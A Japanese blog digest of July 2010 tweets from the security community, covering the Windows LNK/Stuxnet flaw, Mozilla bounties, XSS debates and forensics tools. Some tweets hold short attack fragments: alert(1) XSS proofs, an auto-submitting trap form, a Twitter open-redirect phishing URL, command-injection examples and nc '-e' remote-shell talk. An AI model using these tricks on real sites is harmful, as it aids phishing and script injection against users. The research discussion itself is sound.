スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

7月30日のtwitterセキュリティクラスタ

夏バテ暑いからかDEFCONだからか月末で忙しいのかもしれませんがセキュリティクラスタはおとなしめです。平和ですね。


とっくに締め切られてたと思ってた見学会、まだ空きがあるんですね。仕事がなければいきたいところですが、大事な締め切りがあったりするんだなあ、これが。
ripjyr: まっちゃ445勉強会特別編 株式会社ラック JSOC見学会(学生8/2,一般8/4)まだ空きあります!http://matcha445.techtalk.jp/saturday-workshop/matcha445-jsoc-tour



注意しよう。
trendmicro_jp: [解析者のつぶやき]ガンブラー攻撃によって拡散される偽セキュリティソフト「Securiy Tool」日本語版の流通を確認しました。機械翻訳と思われますが、タスクトレイのバルーンチップも日本語のものが表示されるなど、巧妙さを増しています。ご注意ください。



iPhoneもAndroidこえー。送られたユーザー情報ってどうやって使われるか、そっちの方も気になりますね。
Murashima: 「秘かにユーザー情報を収集するアプリ」が多数 | WIRED VISION http://goo.gl/THzV



不思議な動作です。ここからうまくがんばったりすると報奨金が振り込まれたりするのでしょうか。
hoshikuzu: [sec?] Firefoxにて http://jsbin.com/omahu4 表示後、外部リンクボタンをクリック、アドレスバーがGoogleを確認。さらにpromptでOK押下でexmaple.comへ遷移。ここまで jsbin.comのJSで作動。脆弱性?

hoshikuzu: [sec?]結論から言うと、同一ドメインポリシーを破ってはいないので、この意味では脆弱性とはいいかねる。だけれども不思議な挙動であるとは言える。意見募集。



攻撃されないうちに取り込んでおこうというわけなのですね。わかります。
MasafumiNegishi: DNSSECの root鍵を持ってる 7人のうちの 1人は Dan Kaminskyさんなんだね。どうやって選んでるのかなぁ??



ぼくも歩いて行ける範囲の勉強会なら参加したいです。
ripjyr: .@onodesを囲む会とかで日本全国がサテライトな勉強会を企画しようかな。



メモメモ
hoshikuzu: [tips] twitter 公式検索で、検索語として「to:hoshikuzu」とすると、hoshikuzu あてのmention を検索可能。



貴重な個人情報を有効活用するといって、もらった名刺を使ってメルマガ流す上場企業とかありますよね。
dry2: お預かりした貴重な個人情報は有りとあらゆる目的で有効に活用させて頂きます。」とか、言って欲しいなぁ。
スポンサーサイト

テーマ : セキュリティ
ジャンル : コンピュータ

7月29日のtwitterセキュリティクラスタ

雨だからなのかみんな渡米しているからなのかわかりませんが、昨日のTLは寂しい限りでした。

「認証取得の逆効果」という話がしてみたいということから始まる、企業でのセキュリティ系の認証取得に対する意見交換が興味深かったのでtogetterにまとめておきました。会社によってはPマーク持ってないと取引してくれませんからね…



きっと、細かいことは気にしないんですよ。改良された点のほどんどは、既存のコードに影響を及ぼしませんって言われてますし。
ockeghem: PHP5.2系のアクティブなサポート終了のアナウンスは影響の大きな問題だと思うけど、 PHP界隈では話題になってないような。僕の観測範囲が狭いだけ? いつものことで厭きた?



言い訳はいろいろできるのでしょうけど、目的で考えりゃ真っ黒でしょうね。マジコン使ったチートも違法とか言われるのはどうかと思いますが。
patesalo: マジコンは違法の判決、英国で http://paten.to/aCM8DR



pdfで公開されているLinux標準教科書がiPadアプリになったようです。pdfはただの書籍用データをpdfにしただけの造りなので、アプリらしくかゆいところに手の届く作りになってらいいのになあ。iPad持ってませんがw
connect24h: Linux標準教科書アプリがリリースされた! | iPadWalker.NET http://bit.ly/cbER62



コワイコワイヒー! 入力間違えたかと思ってつい入れちゃいそうでコワイですね。
hoshikuzu: [security] http://twitter.com/login?redirect_after_login=http://example.com ログイン後のリダイレクトURLの指定可。正規のCAPTCHAでの入力に。次に悪意のURLに飛びログイン再入力を。



さすがにMSのおざなりな対応がイヤだった人は多いようです。さすがにどのアイコンも白いのは…
uemat7: アイコン白色防止ツール ■「ショートカット」の脆弱性悪用に対抗する無償ツールが公開 http://www.security-next.com/013781

テーマ : セキュリティ
ジャンル : コンピュータ

7月28日のtwitterセキュリティクラスタ

久しぶりの雨です。なんか猛暑から変わるとびっくりしますね。


職業バグハンターの時代はそこまできているのかもしれません。うらやましいですなあ。会社で仕事の一環としてやったなら、もちろん報酬は会社に行くんですよね。
hasegawayosuke: Amazonギフト券は届かないけれど、Mozilla Security Bug Bounty Program に基づき報酬を支払うYOという連絡がありました。ありがたいことです。

hebikuzure: @hasegawayosuke Mozilla Security Bug Bounty Program の報酬はやっぱり「雑所得」?? 事業所得にしたら職業的バグ ハンター www

hasegawayosuke: @hebikuzure 新しくなった制度だとバグ1件あたり$3000なんですよねー。1か月1個見つけることができれば飯食っていける額ですよね。

hebikuzure: @hasegawayosuke バグ猟師 Yousuke Hasegawa ww。$3000 って、27万円くらいか、今。年20個見つければ.....

ucq: バグを見つけるだけで生きてけるようになりたいです(キリッ

totoromasaki: ち。これがMSなら・・・RT @hebikuzure: @hasegawayosuke Mozilla Security Bug Bounty Program の報酬はやっぱり「雑所得」?? 事業所得にしたら職業的バグ ハンター www *YF*



「蟹換」と「蟹GREP」の頻繁なアップデートが続いています。
Ji2Japan: フォレンジック調査チーム作成ツール 「蟹換」 version.1.4 UPしました。変更内容はBase64エンコードされた文字列からの変換の追加等となります。 http://bit.ly/5wpcAN

Ji2Japan: 日本語検索EnScript「蟹GREP」で%のGREPパターン(\x00?\x25)の抜けがあったことによりUTF-8のURLエンコードの検出が上手くいかない問題を修正し、version 1.0.1としてアップしました。 http://bit.ly/5wpcAN

kikuzou: 蟹GREP v1.0.1 & 蟹換 v1.4 http://bit.ly/bGplok 日本語インターフェースが使いやすいですね~ 日本人ですからw



iPad持ってないけど、他のデバイスにも関係ありそうなので、なんだか気になります。
bakera: iPadのとある挙動はちょっとまずいかもしれない、という話で盛り上がる。

bakera: iPadだけの問題ではなさそう。となると、アプリケーション側で対応しろということなのでしょうか……。めんどくさすぎるのですけど。

bakera: とりあえず、IPAに追加情報として送ってみるのかな……。解決方法思いつかないのですけど。



ネットにつながらないAPだとただのストレス解消ですが、ルーティングできればパケット取… ゲフンゲフン あ、所詮ゲーマーだとあんまり意味ないかもしれませんが。
expl01t: [ac] 大学でガキの電波ジャックの話をするときに,このネタにも触れようかと思った.というか親が出てきた後半部分が知りたいなぁ // wi-fiできますよね? http://douganoyoake.blog18.fc2.com/blog-entry-3966.html

expl01t: [ac] すばらしい高校生を見つけましたw RT: @Tosh1ak1 こんな時の為にネットには繋がらない偽装アクセスポイントを用意するとストレス発散になるшш “@expl01t: [ac] // wi-fiできますよね? http://bit.ly/bgpS4L ”

sonodam: 偽装APでもルーティング出来たらある程度使われてしまったりするのかな?>無線LAN無断借用。ゲーム機持ってるけど無線LANとかほとんど使ったこと無いからよくわからん(笑)。



IPv6は標準でIPSecも使えるから安全なんだもんっていう話もありましたが、それだけじゃ安全じゃないですものね。
Murashima: IPv6セキュリティの課題を検証する「IPv6技術検証協議会」が発足 - ニュース:ITpro http://itpro.nikkeibp.co.jp/article/NEWS/20100728/350762/



alert()の実行方法2つ。いろいろやり方があって、パズルみたいで面白いですね。これで報酬ももらえればいいのに。
hoshikuzu: あぁ、やっぱり。 javascript:alert(1) なa要素を作れてしまった。 とりあえず無害に近いけれど。 →( http://bit.ly/9PHwgn ) 無防備な感じだなぁ。

masa141421356: Operaでアドレスバーに javascript:location.protocol="<script>alert(1)</script>"; と入れると alert(1)が実行されるのか!!!

masa141421356: アドレスバー固有の変な挙動を踏んだらしい。スクリプトからだと単純に拒否されるだけみたい。



基本的に対策されているからなのか、最近あまり見かけないOSコマンドインジェクションについて。当たると大きいですからねえ。IISでいろいろできたのってもう10年くらい前なのかなあ。なつかしす。
ockeghem: OSコマンド・インジェクションに20ページ以上割いている佐名木本にも、書いてないことがありそうだが、これは「OSコマンド・インジェクション脆弱性にこだわらない方が賢明」ということではないか

ockeghem: といいつつ、OSコマンド・インジェクション脆弱性にウダウダとしているのは、やはり「コマンド起動できてこそ攻撃」みたいなところがあるからかも ^^;

ockeghem: system "echo", "`pwd`"; を実行すると、`pwd`と表示されるのね

ockeghem: Perlの場合、system "cmd $arg" だとOSコマンド・インジェクション脆弱性があるけど、system "cmd", $argだと、OSコマンド・インジェクション脆弱性は発生しない?



まあ、会社としては契約違反は保証しませんよね。
Hagexx: apptoi: AppleがDMCAの新ルールに対して「脱獄は補償の対象外」とのコメント http://bit.ly/cz2yDh



私もサイバーストーカーのようにセキュリティクラスタを見守っていく所存でございますw
mincemaker: 「ネットストーカー」より「サイバーストーカー」の方が強そうだな。

テーマ : セキュリティ
ジャンル : コンピュータ

7月27日のtwitterセキュリティクラスタ

PマークとJIPDECに対するダメ出しが興味深かったのでまとめました。以前会社でPマークを取得したことがあったのですが、あれって(以下略)。



普通のユーザーは自分の書いてる文字コードが何かなんてわからないし、変更しようもないと思いますが。ページに自分の文字コードの確認方法と、もし他の文字コードだったときの対応方法を書くのが、アクセシビリティ的にはいいと思いますよw
bakera: [メモ] 思わず吹いた。「※入力時の御注意・文字は「Shift JIS」で入力してください。」 利用者は具体的にどうすればいいんだろう……。 https://www.library-settsu-osaka.jp/toshow/asp/kensaku_w.asp

mincemaker: UTF-7エンコードするなよ、絶対にするなよ! という意思表示なのだろうか……

umq: 「するなよ、絶対にするなよ! という意思表示」って、「しろ」ととらえる人の方が多いんだっけ


UTF-7でいじめるのはもうやめてあげて!
masa141421356: 今は亡き WebKit の UTF-7 のデコーダは + と - の間にある base64で使用されない文字の処理にバグがあったので、 " の前に単独で + を書くと " を無効化することが出来ました。



若手に何を話すのか気になるところです。俺みたいに対象にもっと食らいつけよってメッセージでしょうか。
takesako: 第43回情報科学若手の会 招待講演者 高木浩光 様 おおお! http://wakate.prosym.jp/2010/



「ハッキングの達人」にはぼくも結構なページ書いてるので、たまには勉強会とかに呼ばれないかなあと思うのですが、出版業界裏話くらいしか話すことがないから呼ばれそうにありません。もし自分が主催者なら紳士を呼びたいなあ。
connect24h: 第18回 セキュリティもみじ セミナーの告知(7/31) http://ow.ly/2hgNT 今回は地球防衛軍LACのハニーポットシステムの中の人 松木 さんです。さらに白夜書房プレゼンツ「ハッキングの達人」も参加者プレゼントして5冊放出!奮ってご参加ください。 #spcamp



これ、手間もお金もかかってます。すごいですね。
murachue: やっぱここの人すげえな。勝てないと思った。 http://www.tatsuyoshi.net/toyota/router/



ネットブックって遅くて熱くてこの時期イライラしますよね。
MasafumiNegishi: RT 2012年までにiPadのシェアがネットブックを抜くとの予想 - http://j.mp/a4jmw0



無線LAN同様もれなく盗まれたりするんですね。わかります。
tessy_jp: DEFCON参加者気をつけてw RT @MuscleNerd: Those making iPhone calls at DEFCON 18 this week, beware: http://is.gd/dLJZJ



新しいの出るまではどうすればいいのですか><
hasegawayosuke: 「お姉さんが落としたのはこの金床本ですか? それともこの大垣本ですか?」「いいえ、もっと古い徳丸本です」「正直者にはこの2冊を差し上げ…」「どっちも要りません。新しい徳丸本を下さい


テーマ : セキュリティ
ジャンル : コンピュータ

7月24~26日のtwitterセキュリティクラスタ

なんだかこのところ忙しくて、TLも見落としがちです。キャンプとかDEFCONとかうなぎとかどれにも関ってないのもあるのですが。


そろそろBlackHatが始まるようです。週末は引き続きDEFCONですね。英語がわからないと大変ですが、一年に一度のお祭りを楽しんでくださいー
tessy_jp: BH、DEFCON組は今日くらいからですかねー。ウラヤマ。

kikuzou: もう、ラスベガスについているのかな~



WPA2に脆弱性。「Hole 196」というそうですが、詳しくはBlackHatで発表ということでしょうか。
cdubart: WPA2 Vulnerability Found - http://bit.ly/ci1qov #security

ikutana: ニセのAPを用意してそこにアクセスしてくるWPA2PSKを持ってる端末がいると、プロトコル上その端末に記録されてるPSKを知ることができる ということ? @k4403 詳しくはわからない… watching: yebo blog: WPA2の脆弱性「Hole 196」 -http://yebo-blog.blogspot.com/2010/07/wpa2hole-196.html



管理者の言うとおりにパスワードを難しいものにして変更すると忘れてしまい、逆ギレして管理者のせいにするというのが、よくあるパターンだと思います。
miryu: セキュリティ担当者が想定すべきモデルの一例「自主的にパスワード変更なんてやらない。定期変更強制すると「覚えやすいパスワード+1,2,3...」とカウントアップする運用で簡易化+実効桁数減。当然パスワードは使いまわすし、忘れたらシステム管理者に電話。機密性より可用性が超重要」



linkの脆弱性に対してのスラドの議論。Metasplotで試してみた人の書き込みを見ると自分もやってみたいのですが、時間が…
risa_ozaki: Windows の全バージョンに危険な脆弱性が見つかる #security http://bit.ly/arDOJn via @slashdotjp



業者もグルになって国際電話の通話料で稼ぐってことですか。なんでもありだなあ。
yumano: アカウントハック→電話登録→国際電話のコンボだと思われる RT So-netで不正アクセス被害が2000件超、IP電話の不正利用も http://itpro.nikkeibp.co.jp/article/NEWS/20100722/350514/



ワレズとワロスとワレスとややこしいです。
ntsuji: 「実在企業になりすますフィッシングメールの特徴と対策、Proofpointが解説」 - http://bit.ly/a8d13b 記事の内容よりもワレス氏がカワイイことが気になりました。



先日の「第二回 コンピュータフォレンジクス技術解説 無料セミナー」のまとめ。蟹というとRealtekをどうしても思い出してしまいますが。
port139: FNG15 の内容について覚えている範囲でのメモ、他にもエントロピーの話題とかメモリ・フォレンジックネタもあったんだけど(w > http://d.hatena.ne.jp/hideakii/20100726


port139: 多分、怒濤の更新が発生するのではないかと予測してますけど(笑) RT 蟹GREP v0.9 http://d.hatena.ne.jp/mark-of-distinction/20100723



Yahoo!ケータイの、とりあえず実装しました的な中途半端なXSS対策について。
ockeghem: 業務連絡:Yahoo!ケータイにおいて、URL内に「<」、「>」、「"」のいずれかの文字が出現すると、そこ以降を削除する改修が行われた模様。SSLの場合は削除されないので、ゲートウェイの挙動と思われます

ockeghem: @ockeghem いかにもXSS対策っぽい文字たちであるわけですが、パーセントエンコードすると通ってしまうので、XSS対策としては効果がありません(~o~)

ockeghem: サニタイジングのきつめの奴ですが、穴だらけという改修ですね。副作用が大きいくせに、効果はないという。意図がつかめませんね RT @himecal: そうするとどう影響するんだろう?

ockeghem: ソフトバンクのゲートウェイが削除する文字は、%lt; > " の三文字のみのようですね。7bitASCIIの範囲で網羅的に調べました。「&」は削除するわけにはいかないもんね。


そして、まとめられたものがこちら。「学ぶ」ってのに皮肉がこもっています。
ockeghem: 日記書いた『携帯電話事業者に学ぶ「XSS対策」』http://d.hatena.ne.jp/ockeghem/20100726/p1



合法になってもAppleに見捨てられるのは変わらないでしょうから、そこが心配なんですけど。
MasafumiNegishi: RT アメリカでiPhoneの脱獄が法的に認められる - http://j.mp/bYc3vr



Firefoxのセキュリティを高めたわけじゃなくて、サンドボックスで実行させることで他のOSやアプリに与える影響を下げたということですか。今まで以上に余計にメモリを食いそうですね。
publickey: ブログ書きました: セキュリティを高めた「仮想化Firefox」を無償配布、デル http://www.publickey1.jp/blog/10/firefox_1.html



次はどんな真面目なことが書かれるのか今から楽しみですよ。
mincemaker: はせがわ先生のマジメなpostを見られるのは NetAgent Official Blogだけ!

テーマ : セキュリティ
ジャンル : コンピュータ

7月23日のtwitterセキュリティクラスタ

昨日は「第二回 コンピュータフォレンジクス技術解説 無料セミナー」というのがあって、セミナーの内容がツイートされていました。フォレンジックには全然詳しくないのですが、とても興味深かったです。長いのでtogetterで。




セミナーの前にあった、ありがちなトラブルw
port139: 本日のデモで使うツールの開発元から、指摘していた不具合を修正したから試して!というメールがたった今とどいた

port139: アップグレードしたらうごかねぇぇぇ...orz



NoScriptを入れてるとカットされた広告部分が文字化けすることが多いので、これでXSSが起きたりしないのかなあと妄想します。
hoshikuzu: ↓こういう記事をみかけると、ついつい文字化けでXSS発生しないかと気になる。
hoshikuzu: QT えむけいさん( http://bit.ly/8ZQRQA )::前から安岡先生の日記が文字化けしているのは何かと思っていたのですが、不正な文字参照の並びがIEやChromeやOperaではあたかもサロゲートペアのように扱われることを悪用して「口へんに七」を書いていたのですね



数年前は結構売り込みをかけてた記憶のある検索アプライアンスですが、いろんな意味で放置されているのでしょうか。最近エンタープライズサーチとかどうなったんでしょうね。
hasegawayosuke: Google検索アプライアンスを使っていると思しきサイトのXSSを複数届けていて、もしかすると設定ではなく検索アプライアンスの問題かもしれない、とIPAには連絡している。運営サイト側も「その可能性が高い」と返答。…が、60日どころか 3年近く経過しているが進展なし。公開していいの?

hoshikuzu: @hasegawayosuke おとくいのUTF-7周辺でなら、( http://japan.cnet.com/news/sec/story/0,2000056024,20330807,00.htm ) こういうのも過去にあったのですねぇ。



発見者様の解説ですよ。
hasegawayosuke: ネットエージェント公式ブログ、本日の記事は先日修正された「FirefoxのWeb Workersにおける脆弱性について」です。:-) http://www.netagent-blog.jp/archives/51447889.html



このブログもFC2なので気になります、というかFTPが使えたりするんですね。知らんかった。
connect24h: 無題なブログ FC2ホームページ利用サイト100件が改ざんされ乗っ取られる (ガンブラー) http://ow.ly/2fqE3



そういやWindows2000サポートされなくなるんですね。2000Serverはまだ大丈夫なのかな…
yumano: とっても楽しそうなセミナー RT とってもキケンなWindows 2000セミナー http://www.fourteenforty.jp/seminar/


テーマ : セキュリティ
ジャンル : コンピュータ

7月22日のtwitterセキュリティクラスタ

昨夜は突然の大雨や地震でびっくりですが、今朝も特に何も変わらず暑くて困りますね。


POSTのみしか受け付けないXSSでの攻撃方法について。勉強になります。
mincemaker: Webアプリの検索クエリ結果表示でXSSするとして、POSTのみ許可にしていたらユーザが任意にクエリ発行する以外に再現しないから脅威じゃないだろというのは妥協して良い範囲?

mincemaker: 具体的な攻撃例がいまちょっとコード化できないのだけど外部サイトからクロスドメインで攻撃する方法がありそうな気がするのだけど。

hasegawayosuke: @mincemaker こんな罠ページに誘導すれば。 <body onload="javascript:document.f.submit()"><form name=f methd=post action="http://external.example.jp">...

mincemaker: @hasegawayosuke それだと罠ページと external.example.jp のドメインが違ったらGETで送信になってしまわないです?

hasegawayosuke: @mincemaker http://utf-8.jp/test/ugtop.html

mincemaker: @hasegawayosuke あら、できてますね。今私が対象としているドメインだけ挙動が違うのか。ありがとうございます。悩みます。



ショートカットファイルアイコンを規定の白いものにすれば回避できるんですね。なんだかなあ。
yumano: アイコンが真っ白け~♪ RT @MasafumiNegishi: RT Windowsの「ゼロデイ脆弱性」に回避策、ただし“副作用”に注意(ニュース) - http://j.mp/dt3bYq

ntsuji: ショートカット問題への対応ですね。 MSが未解決の脆弱性問題で「Fix It」を提供――攻撃の回避措置を自動実装 - ITmedia エンタープライズ - http://bit.ly/9dXiqb


そして実演。知らない人は電卓が起動できたから何?って思われそうですけど。
ymzkei5: ■川口洋のつぶやき 第26回 「えええ??Windowsのショートカットで攻撃されるの?」 http://www.youtube.com/watch?v=b2_bT6t8Imc



みんな都市伝説好きだなあ。
scannetsecurity: ScanDispatch:アメリカサイバー司令部紋章に隠された秘密: ●全米のギークが謎解きに奮闘。アメリカサイバー司令部紋章に隠された秘密は? http://url4.eu/6ChHW



仕事で使うツールなどが駆除されることがうちでもたまにありますので、解析する人ってアンチウイルスソフトをどうしてるのか気になります。
ymzkei5: 昨日、社内のMLに悪性スクリプトが投稿されてアンチウイルスに駆除された影響で、なんだか Becky!が調子悪い。頻繁に落ちる。フォルダ修復中。だれですか!駆除されるようなメールを送ったのは。(私です。ごめんなさいっ。><)

ntsuji: @ymzkei5 何が書かれていたんですか?w

ymzkei5: @ntsuji spamメールに含まれていた悪性スクリプトの難読化をひもといたものが、Bloodhound.Exploit.XXX で検知されまくりましたw



SSL証明書の期限が切れても一応暗号化はできるんですよね。
HyoYoshikawa: すんげえラフなこと言えば、サーバー証明書なんて一回取れば十分で、ユーザーはそれでおおむね信頼するよね。期限切れはビジネスモデル的な必然が殆ど。リスクもわかるけど。ベリサインなんて高くて使う気しないもん。だいぶ下がったけどさ。ノラ証明書機関でいいじゃんとか思う。



キャンプの参加者は金床本とか読んでたりするのですか。レベル高そうだなあ。
hasegawayosuke: 金床本はマニアックで非常におもしろいのですが(その節は献本ありがとうございました。ぺこり。)、網羅性や一般性という点では偏りがありすぎるので素直に勧めるには抵抗が。 参考になる書評→ http://www.tokumaru.org/d/20070724.html #spcamp

hasegawayosuke: もし来年であれば、間違いなく @ockeghem さんが現在執筆中という書籍を勧めると思う。まだどんな中身なのかはわからないけれどw #spcamp



僕も見た目だけなら真似できそうなので、とりあえず白い手袋とUVカットのサングラスを買いに行ってきますw
ymzkei5: 私、デジタルフォレンジックの時の白い手袋を見て、思わず、「これって雰囲気作りですか?」と聞いて笑われたことがあります。(^-^;

mincemaker: アクセス探偵マンガみたいに、診断開始イベントでサングラス(UVカット)とか装着すればいいんじゃないでしょうか。


テーマ : セキュリティ
ジャンル : コンピュータ

7月21日のtwitterセキュリティクラスタ

引き続き暑くてたまりません。とりあえずMac miniは暑さでくたばったので、日本中のマシンもくたばるのだと思います。セキュリティも大切ですが、暑さ対策も重要ですね。


危険な(ように見える)添付ファイルについて。exeとかマクロの付いたOfficeのファイルとかいったん開くのに躊躇しますよね。出版社では日常茶飯事で泣けてきましたが。
uemat7: 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」的な内容だけ書かれたメールが来てた。結果、大丈夫だったけど、今のご時世でこれは怖いって…。

s2hm: 今日近くの席の人には、exeが送られてきてました。w RT @uemat7 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」的な内容だけ書かれたメールが来てた。結果、大丈夫だったけど、今のご時世でこれは怖いって…。

uemat7: exeは危険すぎるww私だったら即消去! RT @s2hm :今日近くの席の人には、exeが送られてきてました。w RT @uemat7 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」的な内容だけ書かれたメールが来てた。


s2hm: 内部資料(を装ったものとかも)だと色々やりにくいし、困りますね。

ymzkei5: 大丈夫じゃない本物の標的型が来た方が喜ぶ人が多いのが、うちの会社w QT @uemat7: 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」的な内容だけ書かれたメールが来てた。結果、大丈夫だったけど、今のご時世でこれは怖いって…。

uemat7: 喜ぶのは匠クラスの方々ではないでしょうかw @ymzkei5:大丈夫じゃない本物の標的型が来た方が喜ぶ人が多いのが、うちの会社w QT @uemat7: 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」的な内容だけ書かれたメールが来てた。

cchanabo: 教材教材♪ QT @uemat7: 喜ぶのは匠クラスの方々ではないでしょうかw @ymzkei5:大丈夫じゃない本物の標的型が来た方が喜ぶ人が多いのが、うちの会社w QT @uemat7: 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」的な内容だけ書かれたメールが


cchanabo: 旦那から似たようなことをやられたとき、添付開く前に電話で説教しましたw QT @uemat7: 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」的な内容だけ書かれたメールが来てた。結果、大丈夫だったけど、今のご時世でこれは怖いって…。

uemat7: 身内と言えどもそこは大事ですよねw うーむ、関係者にそれとなく伝えておこうかしら・・・。 QT @cchanabo:旦那から似たようなことをやられたとき、添付開く前に電話で説教しましたw QT @uemat7: 某所から「大事なお知らせあるからとりあえず添付のPDF見てね」



はてなはサイバーノーガード♪とか、オリジナルなアイデンティティをアピールしたいのだと思います。他の会社と同じことをやっていたら生き残れませんからね。
kinugawamasato: はてなのXSSを撲滅させたいけどはてなにその気がない



YouTubeとかなんかは動画が見れればとりあえず偽でもいい人が多そうですけど、ウイルスとか仕込まれるのはやだなあ。。
trendmicro_jp: [セキュリティブログ]検索結果から偽の「YouTube」へ誘導する巧妙な攻撃を解説 http://blog.trendmicro.co.jp/archives/3585



おなじみNirsoftですね。
dsr_hrsm: 自動的にパケットキャプチャして *手軽に* パスワード関係を提示してくれるソフト。便利というか危険というか。 http://bit.ly/blLYWa



BackTrackの新バージョンがBlackhatでリリースされるそうですよ。楽しみ。
backtracklinux: BackTrack 4 r1 BlackHat Edition to be released at .... BlackHat ! http://www.offsec.com/backtrack/backtrack-4-r1-blackhat-edition/



本気のサイバーテロリスト超コワイデス。
yumano: 怖いことがさらりと RT Stuxnetと呼ばれるルートキットの調査中に発見されたもので、発電所などの産業設備インフラの監視制御に用いられているシーメンスSCADAシステムを狙ったものが確認されています http://bit.ly/ctNdvO



SIPの攻撃も増えてるんですね。イタ電かけまくりですか。そうですか。
msaitotypeR: 先日の警察庁の発表とおなじ時期ですね。Targeting VoIP: Increase in SIP Connections on UDP port 5060 http://bit.ly/cijTZN  cNotesも。http://bit.ly/96hR0c



そういや昔は8進数でも使えたなあと思って今IEで試してみたら、http://0300.0250.0000.0001のような表記で接続できました。4桁パディングすればいいんですね。
msaitotypeR: ああ。ISCさん、IPアドレスを0でパディングしちゃだめですよ。8進数と解釈する実装が...最近はないのかな? http://bit.ly/bTbKKy



じゃあなんて呼べばいいんだろ。やっぱ「オタク」と呼び合う原点に回帰しているのでしょうかね。
yumano: 昔のオフ会は気持ち悪いとdisってますな RT @mihochannel: 「みんながハンドルネームで呼び合っていた昔のオフ会のような気持ち悪い集まりではない」ってなにそれ



RECONのトレーニングの話です。続きが気になります。
yarai1978: 今週のアライ出しです。モントリオール編。 http://journal.mycom.co.jp/column/itsecurity/039/index.html



MozillaのページにXSSと記号プログラミングで有名なあの人の名前が掲載されてますよ。
hasegawayosuke: キタ━━━━━━(゚∀゚)━━━━━━━!!!!! http://www.mozilla.org/security/announce/2010/mfsa2010-42.html


そして、日本語の方も。
hasegawayosuke: 「Web ワーカー」って表記気持ち悪い。 http://www.mozilla-japan.org/security/announce/2010/mfsa2010-42.html


報奨金もがっぽりいただけたりするんですかね。
risa_ozaki: バグでより儲かる?: Mozillaが先頃、バグ報奨金を500米ドルから3000米ドルに引き上げた。以下は、このトピックに関するいくつかの考えだ: 部外者によるバグや脆弱性の報告に支払いを行うという… http://bit.ly/c0RTlZ via @FSECUREBLOG


テーマ : セキュリティ
ジャンル : コンピュータ

7月20日のtwitterセキュリティクラスタ

昨日はtwitterの障害であまり見られなかったのでちょっとだけです。きっと暑くてセキュリティクラスタもおとなしめだったはずです。


今月流行のWindowsのショートカットの脆弱性関連。

ベンダーもみんな警告してます。危険そうですね。
risa_ozaki: Windowsのショートカット脆弱性を悪用する「Stuxnet」を各社が警告 http://internet.watch.impress.co.jp/docs/news/20100720_381967.html?ref=rss


そして、専門家の方による検証です。
ntsuji: Windowsシェルにおけるショートカットファイル処理の脆弱性(CVE- 2010-2568)に関する検証レポート http://bit.ly/92IIHX

ntsuji: 紹介したマルウェアは「Stuxnet」です。http://bit.ly/9Ql77w RT @ntsuji: Windowsシェルにおけるショートカットファイル処理の脆弱性(CVE-2010-2568)に関する検証レポート http://bit.ly/92IIHX


Metasploitにもexploitが追加されたそうです。
hdmoore: Exploit for the Windows Shell flaw (LNK) added to #metasploit (CVE-2010-2568): http://bit.ly/ccdCac (3 shells for the price of 1)



bittorrentは大丈夫って言われてた気がするので、日本で公開してたら捕まえちゃうよという見せしめでしょうか。
ntsuji: 「テレビ番組を無断配信=共有ソフト「ビットトレント」-容疑で無職男逮捕・警視庁」http://bit.ly/aRXDWf



セミナー受けてみたいなあ。
risa_ozaki: マルウェア製作者向けセミナーも? 分業化進むマルウェア界 http://www.atmarkit.co.jp/news/201007/14/kaspersky.html



Burp Suiteの新バージョンですよ。マルチバイト文字列の処理にエラーがあったのが修正されたみたいです。
tessy_jp: お、直った?「 Rendering of multi-byte character sets is improved...」 >Burp Suite Professional - release notes: v1.3.07 <http://bit.ly/bc10Fl

テーマ : セキュリティ
ジャンル : コンピュータ

7月17~19日のtwitterセキュリティクラスタ

昨日も今日も一昨日も暑くてたまらないですね。そんな連休中の流れを軽く。


まず、「岡崎市中央図書館に 1秒間に1回アクセスしたら逮捕されたけど不起訴になった件について」 議論する研究会というのが開催されていたようです。参加者は主に法律家と高木先生など学者の先生方だったみたいです。長くなったので関連ツイートはtogetterの方に。



ncやncatなど、ネット接続コマンドラインツールの話。
tomoki0sanaki: debian/Linux の既定で nc(/bin/nc.traditional) に "-e" がある。cryptcat は既定ではインストールしされないらしい。(デスクトップ環境だけど、まぁ、他のエディションでも一緒かなぁ~と勝手に推測)

ntsuji: @tomoki0sanaki 他のディストリでも既定では入っているのは見たことないですね。ちなみに弊社の検査用VMには、sslcatとncatを追加で入れてあります。

tomoki0sanaki: @ntsuji nc は結構、既定で入っている場合が多くないですか?...とはいえ -e オプションは無効ですけど。....Debian/Linux は bash の仮想ネットワークデバイスファイルは無効化しているのに・・・orz

ntsuji: ncはほぼ入ってますね。最近のRedhatとかだと-eがないですね。(CentOSもそうだったような…)ssl接続のためにはcryptcatがメインですか?

ntsuji: @tomoki0sanaki えと、念の為ですが。nc -> ほとんど既定。cryptocat -> 既定はみかけたことがない。というレスでした。検査でクライアントとして使う場合はncatオススメです。 http://n.pentest.jp/?p=216

tomoki0sanaki: @ntsuji ncat 人気高いですね♪



家庭用ブロードバンドルータを攻撃する古くて新しい方法だそうですよ。
MasafumiNegishi: RT DNS Rebinding攻撃を受けやすいルータは何百万もある - http://j.mp/acEA8S



何気なく使ってますがCGIって他のプロセスから情報が見られるんですよね。今さらながらですが。
ockeghem: 高木さんの昔の日記で、「大岩くんは、CGIでBasic認証のパスワードを取得できないようになっている理由を説明した」というのがあるけど、PHPだと、$_SERVER['PHP_AUTH_PW'] でとれますね。これはまずいということかな?

rryu2010: @ockeghem CGIはリクエストボディ以外の情報を環境変数経由で渡しますが、環境変数は無条件で他のプロセスから見られる(ps -Eとか)ので機密情報は含められないというだけです。なので環境変数以外の方法での受け渡しであればOKです。

ockeghem: @rryu2010 なるほど。明快な理由ですね。高木さんはなぜ理由を書かなかったのかな?(本論と関係ないから?)

rryu2010: @ockeghem 元の話を覚えていないのであれですが、CGIを利用するプログラムを作る人が知らなくてもセキュリティ上の問題は起らないからというのもあるかもしれません。




思い込みと読解力不足によるデマってこうやって起こるんだろうなあとか。
kimukou_26: 書いている方が、セキュリティの会社の社長さんだからかなー「CUDAによるGPGPUとセキュリティについて」(http://bit.ly/bdFbNd )なんて話したらOSSなんか使えないし、(工数の安い)外国に開発発注するのもセキュリティリスクだと思うんだけどなー

